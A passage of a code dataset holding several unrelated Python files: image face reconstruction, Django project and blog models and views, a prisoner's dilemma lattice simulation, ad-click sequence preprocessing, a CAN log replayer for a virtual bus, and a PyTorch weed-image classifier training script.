accessed via an morphological operation\n Recommended is an erosion to fit only the center of the face\n \"\"\"\n\n def __init__(self, morphing=-10):\n \"\"\"\n :param morphing: Size of the morphological kernel in percent of\n the image size\n * morphing > 0: dilation -> increase mask\n * morphing < 0: erosion -> decrease mask (recommended)\n \"\"\"\n self.morphing = morphing\n\n def __call__(self, masked_image, cropped_image, mask):\n \"\"\"\n :param masked_image: The masked constructed image\n :param cropped_image: The cropped original image\n :param mask: The mask applied to the image\n :return: The reconstructed image in the cropped scene\n \"\"\"\n H, W = masked_image.shape[:2]\n\n # Calculate image resolution dependent kernel (H==W) (odd size)\n k_size = int(abs(self.morphing) / 100 * H)\n k_size = k_size if (k_size % 2 == 1) else k_size + 1\n kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (k_size, k_size))\n # Execute morphological operations\n # Dilation -> increase masked region\n # Erosion -> decrease masked region\n operation = cv2.MORPH_ERODE if self.morphing < 0 else cv2.MORPH_DILATE\n mask = cv2.morphologyEx(mask, op=operation, kernel=kernel)\n demasked_image = mask[:, :, None] * masked_image + (1 - mask[:, :, None]) * cropped_image\n demasked_image = demasked_image.astype(np.uint8)\n return demasked_image\n\n\nclass FaceDecropperCoarse(object):\n \"\"\"\n Invert the coarse cropping of the image\n \"\"\"\n\n def __call__(self, cropped_image, original_image, bounding_box, offsets):\n \"\"\"\n :param cropped_image: The cropped constructed image\n :param original_image: The original image\n :param bounding_box: Indicator where the cropped region was in the image\n :param offsets: named tuple with the offsets (padding + image out of range) of the\n crop for every bounding box side\n :return: The reconstructed image in the original scene\n \"\"\"\n decropped_image = original_image.copy()\n decropped_image[bounding_box.top:bounding_box.bottom, bounding_box.left:bounding_box.right] = \\\n cropped_image[offsets.top:offsets.bottom, offsets.left:offsets.right]\n return decropped_image\n","sub_path":"implementation/Preprocessor/FaceReconstructor.py","file_name":"FaceReconstructor.py","file_ext":"py","file_size_in_byte":9675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"138294971","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModels for the project module.\n\"\"\"\n\n\nfrom django.db import models\n\n\nclass Project(models.Model):\n \"\"\"\n Represenatatino of a project. Has an\n identifier (like that one in redmine),\n a name etc.\n \n Can be configured to be displayed on the dashboard (or not).\n \"\"\"\n id = models.PositiveIntegerField(primary_key=True, editable=False)\n identifier = models.CharField(max_length=100, unique=True)\n name = models.CharField(max_length=255)\n description = models.TextField(null=True, blank=True)\n created_on = models.DateTimeField()\n updated_on = models.DateTimeField()\n dashboard_show = models.BooleanField(default=True)\n dashboard_color = models.CharField(max_length=7, default='#96BF0D', help_text='HTML Color Hex Code (e.g. #ff0000)')\n \n def __unicode__(self):\n return self.identifier\n\n\nclass Employee(models.Model):\n \"\"\"\n An employee belongs to many projects. The rest should be self explanatory. :)\n \"\"\"\n id = models.PositiveIntegerField(primary_key=True, editable=False)\n login = models.CharField(max_length=255, unique=True)\n firstname = models.CharField(max_length=255)\n lastname = models.CharField(max_length=255)\n mail = models.CharField(max_length=255)\n created_on = models.DateTimeField()\n last_login_on = models.DateTimeField(null=True, blank=True)\n project = models.ManyToManyField(Project)\n \n def __unicode__(self):\n return self.login\n\n\nclass IssueTracker(models.Model):\n \"\"\"\n Bug, Feature or Support? Taken from Redmine, but should be relatively\n generic to use with other ticket systems.\n \"\"\"\n id = models.PositiveIntegerField(primary_key=True, editable=False)\n name = models.CharField(max_length=255)\n\n\nclass IssueStatus(models.Model):\n \"\"\"\n The status of an issue. For example: New, In Progress, et cetera.\n \"\"\"\n id = models.PositiveIntegerField(primary_key=True, editable=False)\n name = models.CharField(max_length=255)\n \n def __unicode__(self):\n return self.name\n \n class Meta:\n verbose_name_plural = 'Issue status'\n\n\nclass IssuePriority(models.Model):\n \"\"\"\n The priority of an issue.\n \"\"\"\n id = models.PositiveIntegerField(primary_key=True, editable=False)\n name = models.CharField(max_length=255)\n \n class Meta:\n verbose_name_plural = 'Issue priorities'\n\n\nclass Issue(models.Model):\n \"\"\"\n An issue. Belongs to a project. All issues will be wiped and re-imported\n from/to database upon import.\n \"\"\"\n id = models.PositiveIntegerField(primary_key=True, editable=False)\n subject = models.CharField(max_length=255)\n description = models.TextField(null=True, blank=True)\n done_ratio = models.PositiveSmallIntegerField()\n created_on = models.DateTimeField()\n updated_on = models.DateTimeField()\n start_date = models.DateField(null=True, blank=True)\n due_date = models.DateField(null=True, blank=True)\n estimated_hours = models.FloatField(null=True, blank=True)\n author = models.ForeignKey(Employee, related_name='author')\n project = models.ForeignKey(Project)\n status = models.ForeignKey(IssueStatus)\n assigned_to = models.ForeignKey(Employee, null=True)\n tracker = models.ForeignKey(IssueTracker)\n priority = models.ForeignKey(IssuePriority)\n imported_at = models.DateTimeField()\n \n def admin_status(self):\n return self.status.name\n admin_status.allow_tags = False\n admin_status.short_description = 'Status'\n\n","sub_path":"Quellcode/mp2board/modules/project/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"391242297","text":"\"\"\"\r\nWeak Prisonner's dilemna with Von NEumann neighbours\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport random\r\n\r\n\r\ndef make_lattice(n):\r\n lattice = []\r\n strategy = []\r\n for i in range(n):\r\n line_L = []\r\n line_R = []\r\n for j in range(n):\r\n line_L.append(0)\r\n # 0 for C and 1 for D\r\n line_R.append(random.choice([0,1]))\r\n lattice.append(line_L)\r\n strategy.append(line_R)\r\n lattice = np.array(lattice)\r\n strategy = np.array(strategy)\r\n return lattice,strategy\r\n\r\n\r\ndef show_plot(strategy):\r\n plt.imshow(strategy,interpolation='nearest')\r\n plt.axis('off')\r\n plt.show()\r\n\r\n\r\ndef get_neighbours_von_neuman(row,col,size):\r\n x = row\r\n y = col\r\n up = x - 1\r\n right = (y + 1) % size\r\n down = (x + 1) % size\r\n left = y - 1\r\n\r\n u = (up, y)\r\n r = (x, right)\r\n d = (down, y)\r\n l = (x, left)\r\n\r\n return [u,r,d,l]\r\n\r\n\r\ndef score(pos, strategy, neighbours, payoff):\r\n \"\"\"\r\n Score for each player, sum of all the payoff of all the neighbours\r\n :param pos: position of player\r\n :param strategy: arrays of strategy of the players\r\n :param neighbours: list of tuples of positions for neighbours\r\n :param payoff: matrix of payoff\r\n :return: score\r\n \"\"\"\r\n R = payoff[0]\r\n S = payoff[1]\r\n T = payoff[2]\r\n P = payoff[3]\r\n x,y = pos\r\n score = 0\r\n\r\n if strategy[x][y] == 0:\r\n for neighbour in neighbours:\r\n a,b = neighbour\r\n if strategy[a][b] == 0:\r\n score += R\r\n else:\r\n score += S\r\n else:\r\n for neighbour in neighbours:\r\n a,b = neighbour\r\n if strategy[a][b] == 0:\r\n score += T\r\n else:\r\n score += P\r\n\r\n return score\r\n\r\n\r\ndef update_scores_von_neuman(lattice,strategy,payoff,size):\r\n \"\"\"\r\n Update the lattice with von neumann neighbours\r\n \"\"\"\r\n for i in range(size):\r\n for j in range(size):\r\n neighbours = get_neighbours_von_neuman(i,j,size)\r\n lattice[i][j] = score((i,j),strategy,neighbours,payoff)\r\n\r\n\r\ndef update_strat_von_neuman(lattice,strategy,size):\r\n new_strategy = np.zeros((size,size))\r\n for i in range(size):\r\n for j in range(size):\r\n neighbours = get_neighbours_von_neuman(i,j,size)\r\n best_score = lattice[i][j]\r\n best_strat = strategy[i][j]\r\n for neighbour in neighbours:\r\n x,y = neighbour\r\n if best_score < lattice[x][y]:\r\n best_score = lattice[x][y]\r\n best_strat = strategy[x][y]\r\n new_strategy[i][j] = best_strat\r\n return new_strategy\r\n\r\n\r\ndef plot_coop(cooperation_level,size):\r\n fig = plt.figure()\r\n fig.suptitle(\"Cooperation level Stag-Hunt game with Von Neumann neighbours\\nLattice of \"\r\n \"size %sx%s & Unconditional\" % (size,size),\r\n fontsize=14,\r\n fontweight='bold')\r\n\r\n ax = fig.add_subplot(111)\r\n\r\n ax.set_xlabel('Turns')\r\n ax.set_ylabel('Cooperation level averaged over 100 runs')\r\n x = np.arange(101)\r\n cooperation_level = np.array(cooperation_level)\r\n y = np.mean(cooperation_level,axis=0)\r\n ax.plot(x,y)\r\n ax.set_ylim([0,1])\r\n\r\n plt.show()\r\n\r\n\r\ndef final_distribution(final_coop,size):\r\n fig = plt.figure()\r\n fig.suptitle(\"Distribution of final cooperation levels of\\n Stag-Hunt game with Von \"\r\n \"Neumann Neighbours\\nLattice of size %sx%s & Unconditional\" %(size,size),\r\n fontsize=14,\r\n fontweight='bold')\r\n\r\n ax = fig.add_subplot(111)\r\n\r\n ax.set_xlabel('Cooperation levels')\r\n ax.set_ylabel('Number of runs')\r\n\r\n x = np.array(final_coop)\r\n\r\n ax.hist(x,5)\r\n ax.set_ylim([0,100])\r\n ax.set_xlim([0,1])\r\n\r\n plt.show()\r\n\r\n\r\ndef main(size,payoff):\r\n #initiate lattices\r\n lattice,strategy = make_lattice(size)\r\n show_plot(strategy)\r\n\r\n cooperation_level = [((size*size) - np.sum(strategy))/(size*size)]\r\n\r\n #100 turns\r\n for i in range(100):\r\n update_scores_von_neuman(lattice,strategy,payoff,size)\r\n strategy = update_strat_von_neuman(lattice,strategy,size)\r\n cooperation_level.append(((size*size) - np.sum(strategy))/(size*size))\r\n\r\n if i == 1 or i == 5 or i == 10 or i == 20 or i == 50 or i == 100:\r\n show_plot(strategy)\r\n\r\n return cooperation_level\r\n\r\n\r\nif __name__ == \"__main__\":\r\n size = int(input(\"Size of the Lattice:\"))\r\n #size = str(input(\"Size of the lattice: \"))\r\n payoff = str(input(\"Reward, Sucker's payoff, Temptation to Defect, Punition : \"))\r\n payoff = payoff.strip().split(',')\r\n\r\n for i in range(4):\r\n payoff[i] = int(payoff[i])\r\n \"\"\"size = size.strip().split(',')\r\n for i in range(len(size)):\r\n size[i] = int(size[i])\r\n\r\n for lattice in size:\r\n cooperation_level = []\r\n final_cooperation_level = []\r\n for i in range(100):\r\n current = main(lattice, payoff)\r\n cooperation_level.append(current)\r\n final_cooperation_level.append(current[-1])\r\n print(i)\r\n plot_coop(cooperation_level, lattice)\r\n final_distribution(final_cooperation_level, lattice)\"\"\"\r\n main(size, payoff)","sub_path":"Learning_Dynamics/CharlotteNachtegael/Assignments/PD_Von_neumann.py","file_name":"PD_Von_neumann.py","file_ext":"py","file_size_in_byte":5343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"649955330","text":"import os, pdb, torch\nimport pandas as pd\nimport numpy as np\n\nfrom Configs import _C as cfg\nfrom .click import make_click_with_ad\n\n\ndef make_user_behavior_seq_test(cols = ['creative_id', 'ad_id', 'advertiser_id',]):\n\n save_dir = cfg.features + \"user_behavior_df_test.pkl\"\n if os.path.exists(save_dir):\n print(\"已存在 `{}`, 直接读取返回...\".format(save_dir))\n user_behavior_df_test=pd.read_pickle(save_dir)\n return user_behavior_df_test\n\n print(\"\\n无本地 user_behavior_df_test, 重新生成 `{}`\".format(save_dir))\n click_all = make_click_with_ad()\n click_all.replace('\\\\N', 'nan', inplace=True)\n\n for col in cols:\n decode_list = torch.load(cfg.decode + f\"all_{col}_decode_string.pth\").split(',')\n decode_dict = {v: str(i) for i, v in enumerate(decode_list)}\n\n click_all[col] = click_all[col].astype('str').map(decode_dict)\n print(\"all_{}_decode_list: {}\".format(col, decode_list[:20]))\n print(\"click_all[`{}`]: {}\".format(col, click_all[col][:60]))\n\n click_test = click_all.query(\"type=='test'\").sort_values([\"time\"]).reset_index(drop=True)\n\n click_test['user_id'] = click_test['user_id'].astype('int64')\n\n user_group = click_test.groupby(['user_id'])\n user_behavior_df_test = pd.DataFrame()\n for col in cols:\n df = user_group.agg({col: list})\n user_behavior_df_test[col + \"_200\"] = df[col].map(lambda sentence: ','.join(sentence))\n\n user_behavior_df_test['seq_length'] = user_group[cols[0]].agg('count').values\n\n user_behavior_df_test.reset_index().to_pickle(save_dir)\n\n return user_behavior_df_test\n\n\ndef make_user_behavior_seq(cols = ['creative_id', 'ad_id', 'advertiser_id',]):\n\n save_dir = cfg.features + \"user_behavior_df.pkl\"\n if os.path.exists(save_dir):\n print(\"已存在 `{}`, 直接读取返回...\".format(save_dir))\n user_behavior_df=pd.read_pickle(save_dir)\n return user_behavior_df\n\n print(\"\\n无本地 user_behavior_df, 重新生成 `{}`\".format(save_dir))\n click_all = make_click_with_ad()\n click_all.replace('\\\\N', 'nan', inplace=True)\n\n for col in cols:\n decode_list = torch.load(cfg.decode + f\"all_{col}_decode_string.pth\").split(',')\n decode_dict = {v: str(i) for i, v in enumerate(decode_list)}\n\n click_all[col] = click_all[col].astype('str').map(decode_dict)\n print(\"all_{}_decode_list: {}\".format(col, decode_list[:20]))\n print(\"click_all[{}]: {}\".format(col, click_all[col][:60]))\n if click_all[col].isna().any():\n pdb.set_trace()\n\n click_train = click_all.query(\"type=='train'\").sort_values([\"time\"]).reset_index(drop=True)\n click_test = click_all.query(\"type=='test'\").sort_values([\"time\"]).reset_index(drop=True)\n\n click_train['user_id'] = click_train['user_id'].astype('int64')\n\n user_group = click_train.groupby(['user_id'])\n user_behavior_df = pd.DataFrame()\n for col in cols:\n df = user_group.agg({col: list})\n user_behavior_df[col + \"_200\"] = df[col].map(lambda sentence: ','.join(sentence))\n\n user_behavior_df['seq_length'] = user_group[cols[1]].agg('count').values\n\n user = pd.read_csv(cfg.train_dir+'/user.csv')\n user['user_id'] = user['user_id'].astype('int64')\n user_behavior_df = user_behavior_df.reset_index().merge(user, how=\"left\", on=\"user_id\")\n user_behavior_df.to_pickle(save_dir)\n\n return user_behavior_df\n\n\ndef clip_fn(sentence):\n length = len(sentence)\n if length >= 200:\n sentence = sentence[-200:]\n else:\n sentence += [0] * (200 - length)\n return ','.join(sentence)\n\n\ndef seq2lengths(seq):\n length = (np.array(seq) != 0).sum()\n return length\n\n\ndef seq2string_with_length(seq):\n length = len(seq)\n seq_string = \",\".join(str(w) for w in seq)\n return f\"{seq_string}_{length}\"\n\n\n\n\"\"\" \ncreative_id, 3412772 | 931637\nad_id, 3027360 | 763170\nuser_id, 1900000\nclick_times, 94 | 53\nproduct_id, 39057 | 5784\nproduct_category, 18 | None\nadvertiser_id, 57870\nindustry, 332 | {8, 89, 93, 151, 195, 196}\ncategory 1-18, 无需编码\n\"\"\"\n","sub_path":"src/processing/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"218617247","text":"import string\nst = input(\"Please enter the string: \")\nx = list(string.ascii_letters)\ny = list(string.digits)\nlet, dig = 0, 0\nfor i in st:\n if i in x:\n let+=1\n elif i in y:\n dig+=1\n\nprint(let,dig)\n \n\n","sub_path":"programsstring.py","file_name":"programsstring.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"34560910","text":"from functools import partial\nfrom itertools import islice\nimport datetime\nimport bitstring\nimport struct\nimport time\nfrom time import sleep\n\nimport socket\n\nfrom can import Message\n\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n\ndef decode(msg: bytes):\n '''\n\n :param msg 16 bytes:\n :return: service_info, timeoffest, messaege_id, data =\n '''\n\n service, msg = msg[:2], msg[2:]\n time_of_record_in_miliseconds, msg = int.from_bytes(msg[:2], byteorder=\"little\", signed=False), msg[2:]\n message_id, message = msg[:4], msg[4:]\n bs = bitstring.BitArray(service)\n bs.reverse()\n time_of_record_in_miutes = bs[:10]\n minutes = int(time_of_record_in_miutes.bin, 2)\n\n return bs.bin, int(bs[10]), bs[14], bs[15], int(bs[11:14].bin, 2), str(\n datetime.timedelta(minutes=minutes, milliseconds=time_of_record_in_miliseconds))[:-3], bitstring.BitArray(\n message_id).bin, message.hex()\n\n\ndef decode2(msg: bytes):\n\n\n\n service, msg = msg[:2], msg[2:]\n time_of_record_in_miliseconds, msg = int.from_bytes(msg[:2], byteorder=\"little\", signed=False), msg[2:]\n message_id, message = msg[:4], msg[4:]\n\n\n\n ms = bitstring.BitArray(message_id[::-1])\n ms_reversed = bitstring.BitArray(message_id)\n\n\n service = bitstring.BitArray(service[::-1])[::-1]\n\n is_service = service[14]\n is_29 = service[15]\n data_len = int(service[11:14].bin,2)+1\n time_in_minutes = int(service[0:10].bin, 2)\n\n\n return is_service, time_in_minutes, time_of_record_in_miliseconds, ms.hex, str(message.hex())[:data_len*2]\n\nimport can\n\nbustype = 'socketcan'\nchannel = 'vcan0'\nbus = can.interface.Bus(channel=channel, bustype=bustype)\n\ndef send_data():\n with open(\"output.CAN\", \"rb\") as canfile:\n messages = iter(partial(canfile.read, 16), b'')\n ids = set()\n # print(header.hex(), decode2(header))\n time = 1\n prev_time_in_ms = 0\n\n\n for chunk in islice(messages, 99999999999999999):\n is_service, time_in_minutes, time_in_milliseconds, message_id, message = decode2(chunk)\n dt = time_in_milliseconds - prev_time_in_ms\n # time.sleep(new_time - dt)\n if(dt)<0: dt =1\n time+= dt\n\n delta = datetime.timedelta(milliseconds = time)\n\n\n prev_time_in_ms = time_in_milliseconds\n\n \n date =str(delta)[:-3]\n\n if len(date)< 8:\n continue\n\n\n result = \"%s %s %s %s\\r\\n\" %( date, \"N\" if is_service else \"R\", message_id, \" \".join(chunks(message,2)))\n msg = Message(arbitration_id=int(message_id,16), data=list(map(lambda x: int(x, 16), chunks(message,2))), extended_id=True)\n bus.send(msg)\n print(msg)\n sleep(dt/1000)\n \n\n\n\nif __name__ == \"__main__\":\n send_data()\n\n\n","sub_path":"can2vcan.py","file_name":"can2vcan.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"53106801","text":"from django.shortcuts import render, get_object_or_404\nfrom django.db.models import Count\n\nfrom .models import Blog, BlogType, Tag\n\ndef index(request):\n '''首页'''\n blogs = Blog.objects.all()[:10]\n hot_blogs = Blog.objects.all().order_by('-read_nums')[:5]\n blog_types = BlogType.objects.all()\n tags = Tag.objects.all()\n\n context = {}\n context['blogs'] = blogs\n context['hot_blogs'] = hot_blogs\n context['blog_types'] = blog_types\n context['tags'] = tags\n return render(request, 'blog/index.html', context)\n\ndef blog_list(request):\n '''博客列表'''\n blogs = Blog.objects.all()\n\n # annotate聚合, 逐个计算queryset中每个对象的blog数量, 并给每个对象添加blog_count属性\n blog_types = BlogType.objects.all().annotate(blog_nums=Count('blog'))\n\n tags = Tag.objects.all()\n\n # 获取所有博客的月份的datetime.date对象集合\n blog_dates = Blog.objects.dates('publish_time', 'month', order='DESC')\n # 统计对应月份blog数量\n blog_dates_dict = {}\n for blog_date in blog_dates:\n blog_nums = Blog.objects.filter(publish_time__year=blog_date.year, \\\n publish_time__month=blog_date.month).count()\n blog_dates_dict[blog_date] = blog_nums\n\n context = {}\n context['blogs'] = blogs\n context['blog_types'] = blog_types\n context['tags'] = tags\n context['blog_dates'] = blog_dates_dict\n return render(request, 'blog/blog_list.html', context)\n\ndef blog_detail(request, blog_id):\n '''博客详情'''\n blog = get_object_or_404(Blog, pk=blog_id)\n blog.read_nums = blog.read_nums + 1\n blog.save()\n # 上一篇博客\n previous_blog = Blog.objects.filter(publish_time__gt=blog.publish_time).order_by('publish_time').first()\n # 下一篇博客\n next_blog = Blog.objects.filter(publish_time__lt=blog.publish_time).order_by('-publish_time').first()\n\n context = {}\n context['blog'] = blog\n context['previous_blog'] = previous_blog\n context['next_blog'] = next_blog\n return render(request, 'blog/blog_detail.html', context)\n\n\ndef blog_type(request, blog_type_id):\n pass\n\n\ndef blog_date(request, year, month):\n pass","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"342956346","text":"from torchvision import datasets, models, transforms\nimport torch.utils.data as data\nfrom torch.utils.tensorboard import SummaryWriter\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nimport torch.nn as nn\nimport torch, os\n# for reproducing\ntorch.manual_seed(66)\ntorch.backends.cudnn.benchmark = False\ntorch.backends.cudnn.deterministic = True\n\nimport time, copy\nimport multiprocessing\nfrom torchsummary import summary\nimport pretrainedmodels # for inception-v4 and xception\nfrom efficientnet_pytorch import EfficientNet\nimport csv\nimport argparse\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train CottonWeed Classifier')\n # Load a pretrained model - resnet18, resnet50, resnet101, alexnet, squeezenet, vgg11, vgg16, vgg19,\n # densenet121, densenet169, densenet161, inception, inceptionv4, googlenet, xception, mobilenet_v2,\n # mobilenet_v3_small, mobilenet_v3_large, inceptionresnetv2, dpn68, mnasnet1_0, efficientnet-b0\n # efficientnet-b1, efficientnet-b2, efficientnet-b3, efficientnet-b4, efficientnet-b5\n parser.add_argument('--model_name', type=str, required=False, default='alexnet',\n help=\"choose a deep learning model\")\n parser.add_argument('--train_mode', type=str, required=False, default='finetune',\n help=\"Set training mode: finetune, transfer, scratch\")\n parser.add_argument('--num_classes', type=int, required=False, default=15, help=\"Number of Classes\")\n parser.add_argument('--epochs', type=int, required=False, default=50, help=\"Training Epochs\")\n parser.add_argument('--batch_size', type=int, required=False, default=12, help=\"Training batch size\")\n parser.add_argument('--img_size', type=int, required=False, default=512, help=\"Image Size\")\n args = parser.parse_args()\n return args\n\n\nargs = parse_args()\nnum_classes = args.num_classes\nmodel_name = args.model_name\ntrain_mode = args.train_mode\nnum_epochs = args.epochs\nbs = args.batch_size\nimg_size = args.img_size\n# Set the train and validation directory paths\ntrain_directory = '/home/dong9/Downloads/DATA_0820/CottonWeedDataset/train'\nvalid_directory = '/home/dong9/Downloads/DATA_0820/CottonWeedDataset/val'\n\nif not os.path.isfile('train_performance.csv'):\n with open('train_performance.csv', mode='w') as csv_file:\n fieldnames = ['Model', 'Training Time', 'Trainable Parameters', 'Best Train Acc', 'Best Train Epoch',\n 'Best Val Acc', 'Best Val Epoch']\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n\n# Set the model save path\nPATH = model_name + \".pth\"\n# Number of workers\nnum_cpu = multiprocessing.cpu_count()\n\n# Applying transforms to the data\nimage_transforms = {\n 'train': transforms.Compose([\n transforms.RandomResizedCrop(size=img_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ]),\n 'valid': transforms.Compose([\n transforms.Resize(size=img_size),\n transforms.CenterCrop(size=img_size),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ])\n}\n\n# Load data from folders\ndataset = {\n 'train': datasets.ImageFolder(root=train_directory, transform=image_transforms['train']),\n 'valid': datasets.ImageFolder(root=valid_directory, transform=image_transforms['valid'])\n}\n\n# Size of train and validation data\ndataset_sizes = {\n 'train': len(dataset['train']),\n 'valid': len(dataset['valid'])\n}\n\n# Create iterators for data loading\ndataloaders = {\n 'train': data.DataLoader(dataset['train'], batch_size=bs, shuffle=True,\n num_workers=num_cpu, pin_memory=True, drop_last=True),\n 'valid': data.DataLoader(dataset['valid'], batch_size=bs, shuffle=True,\n num_workers=num_cpu, pin_memory=True, drop_last=True)}\n\n# Class names or target labels\nclass_names = dataset['train'].classes\nprint(\"Classes:\", class_names)\n\n# Print the train and validation data sizes\nprint(\"Training-set size:\", dataset_sizes['train'],\n \"\\nValidation-set size:\", dataset_sizes['valid'])\n\nprint(\"\\nLoading pretrained-model for finetuning ...\\n\")\nmodel_ft = None\n\nif model_name == 'resnet18':\n # Modify fc layers to match num_classes\n model_ft = models.resnet18(pretrained=True)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'resnet50':\n # Modify fc layers to match num_classes\n model_ft = models.resnet50(pretrained=True)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'resnet101':\n # Modify fc layers to match num_classes\n model_ft = models.resnet101(pretrained=True)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'alexnet':\n model_ft = models.alexnet(pretrained=True)\n model_ft.classifier[6] = nn.Linear(4096, num_classes)\nelif model_name == 'vgg11':\n model_ft = models.vgg11(pretrained=True)\n model_ft.classifier[6] = nn.Linear(4096, num_classes)\nelif model_name == 'vgg16':\n model_ft = models.vgg16(pretrained=True)\n model_ft.classifier[6] = nn.Linear(4096, num_classes)\nelif model_name == 'vgg19':\n model_ft = models.vgg19(pretrained=True)\n model_ft.classifier[6] = nn.Linear(4096, num_classes)\nelif model_name == 'squeezenet':\n model_ft = models.squeezenet1_0(pretrained=True)\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1, 1), stride=(1, 1))\nelif model_name == 'densenet121':\n model_ft = models.densenet121(pretrained=True)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'densenet169':\n model_ft = models.densenet169(pretrained=True)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'densenet161':\n model_ft = models.densenet161(pretrained=True)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'inception':\n model_ft = models.inception_v3(pretrained=True)\n model_ft.aux_logits = False\n # Handle the auxilary net\n num_ftrs = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\n # Handle the primary net\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'inceptionv4':\n model_ft = pretrainedmodels.inceptionv4(pretrained='imagenet')\n num_ftrs = model_ft.last_linear.in_features\n model_ft.last_linear = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'googlenet':\n model_ft = models.googlenet(pretrained=True)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'xception':\n model_ft = pretrainedmodels.xception(pretrained='imagenet')\n num_ftrs = model_ft.last_linear.in_features\n model_ft.last_linear = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'mobilenet_v2':\n model_ft = models.mobilenet_v2(pretrained=True)\n model_ft.classifier[1] = nn.Linear(model_ft.last_channel, num_classes)\nelif model_name == 'mobilenet_v3_small':\n model_ft = models.mobilenet_v3_small(pretrained=True)\n model_ft.classifier[3] = nn.Linear(model_ft.classifier[3].in_features, num_classes)\nelif model_name == 'mobilenet_v3_large':\n model_ft = models.mobilenet_v3_large(pretrained=True)\n model_ft.classifier[3] = nn.Linear(model_ft.classifier[3].in_features, num_classes)\nelif model_name == 'shufflenet_v2_x0_5':\n model_ft = models.shufflenet_v2_x0_5(pretrained=True)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'shufflenet_v2_x1_0':\n model_ft = models.shufflenet_v2_x1_0(pretrained=True)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'inceptionresnetv2':\n model_ft = pretrainedmodels.inceptionresnetv2(pretrained='imagenet')\n num_ftrs = model_ft.last_linear.in_features\n model_ft.last_linear = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'nasnetamobile':\n model_ft = pretrainedmodels.nasnetamobile(num_classes=1000, pretrained='imagenet')\n num_ftrs = model_ft.last_linear.in_features\n model_ft.last_linear = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'dpn68':\n model_ft = pretrainedmodels.dpn68(pretrained='imagenet')\n model_ft.last_linear = nn.Conv2d(832, num_classes, kernel_size=(1, 1), stride=(1, 1))\nelif model_name == 'polynet':\n model_ft = pretrainedmodels.polynet(num_classes=1000, pretrained='imagenet')\n num_ftrs = model_ft.last_linear.in_features\n model_ft.last_linear = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'mnasnet1_0':\n model_ft = models.mnasnet1_0(pretrained=True)\n num_ftrs = model_ft.classifier[1].in_features\n model_ft.classifier[1] = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'efficientnet-b0':\n model_ft = EfficientNet.from_pretrained('efficientnet-b0', num_classes=num_classes)\nelif model_name == 'efficientnet-b1':\n model_ft = EfficientNet.from_pretrained('efficientnet-b1', num_classes=num_classes)\nelif model_name == 'efficientnet-b2':\n model_ft = EfficientNet.from_pretrained('efficientnet-b2', num_classes=num_classes)\nelif model_name == 'efficientnet-b3':\n model_ft = EfficientNet.from_pretrained('efficientnet-b3', num_classes=num_classes)\nelif model_name == 'efficientnet-b4':\n model_ft = EfficientNet.from_pretrained('efficientnet-b4', num_classes=num_classes)\nelif model_name == 'efficientnet-b5':\n model_ft = EfficientNet.from_pretrained('efficientnet-b5', num_classes=num_classes)\nelif model_name == 'efficientnet-b6':\n model_ft = EfficientNet.from_pretrained('efficientnet-b6', num_classes=num_classes)\nelse:\n print(\"Invalid model name, exiting...\")\n exit()\n\n# Transfer the model to GPU\n# Set default device as gpu, if available\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n# model_ft = nn.DataParallel(model_ft)\nmodel_ft = model_ft.to(device)\n\n# Print model summary\nprint('Model Summary:-\\n')\nfor num, (name, param) in 